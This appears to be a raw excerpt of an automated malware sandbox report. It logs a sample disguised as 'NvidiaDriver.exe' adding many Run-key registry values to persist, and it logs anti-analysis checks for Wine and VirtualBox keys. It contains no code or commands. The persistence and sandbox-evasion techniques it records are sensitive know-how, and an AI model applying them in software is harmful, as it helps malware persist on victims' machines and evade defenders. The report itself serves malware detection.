                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_857dfbcf71e84a5ba3b172f733901942Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_857dfbcf71e84a5ba3b172f733901942Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_7d53de950f514e7fb1dc1bf9aa9d9a23Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_7d53de950f514e7fb1dc1bf9aa9d9a23Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_48773bbf9bc44914991bdff0f06d6074Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_48773bbf9bc44914991bdff0f06d6074Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5fb642a978ef46ad8babc9faf499af6cJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5fb642a978ef46ad8babc9faf499af6cJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_a55229b8a2774bf08fa8699a442ee253Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_a55229b8a2774bf08fa8699a442ee253Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_c85face801814dfcbf9f40ddf33828eaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_c85face801814dfcbf9f40ddf33828eaJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_aeaa297d9f6e41859577216271c48f3dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_aeaa297d9f6e41859577216271c48f3dJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_fea82d6593394f6f8b93c4ec7bd2f15eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_fea82d6593394f6f8b93c4ec7bd2f15eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_087ea3eefa284f9190e36501b7153e61Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_087ea3eefa284f9190e36501b7153e61Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_dcc27a0fe2814cfdb3b842eaa11bb6b9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_dcc27a0fe2814cfdb3b842eaa11bb6b9Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8630aa22d8f8447f80b461615583d4f2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_8630aa22d8f8447f80b461615583d4f2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_af5be24324564f8598b7623cec319969Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_af5be24324564f8598b7623cec319969Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ca448a9bcb184f7387acce04e7da97c2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_ca448a9bcb184f7387acce04e7da97c2Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_bec0a0ec3f194774a3f57ddb54802f67Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_bec0a0ec3f194774a3f57ddb54802f67Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_d98eb4fbef8244ecb9602668b4296585Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_d98eb4fbef8244ecb9602668b4296585Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5d927519720546599f9ee15ceecbdc9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_5d927519720546599f9ee15ceecbdc9eJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_41c478a1bd2342b88270b91a0df5f087Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_41c478a1bd2342b88270b91a0df5f087Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_01f5a14ab3654771aa2b02ec3ef86ec7Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_01f5a14ab3654771aa2b02ec3ef86ec7Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9886616d44f44e36ac8eb72511e99fd5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_9886616d44f44e36ac8eb72511e99fd5Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_0765bda3d5fe4b4c9f38906a3576db2fJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run InternetDriver_0765bda3d5fe4b4c9f38906a3576db2fJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9DNEMG3H6COYF8VY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\InternetDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\184f72cd859c47b29124ab7c76766326.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\NvidiaDriver\NvidiaDriver.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, Sleepgraph_6-38098
                        Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-12157
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_1-9682
                        Source: C:\Users\user\AppData\Local\Temp\1013229001\0tClIDb.exeSystem information queried: FirmwareTableInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
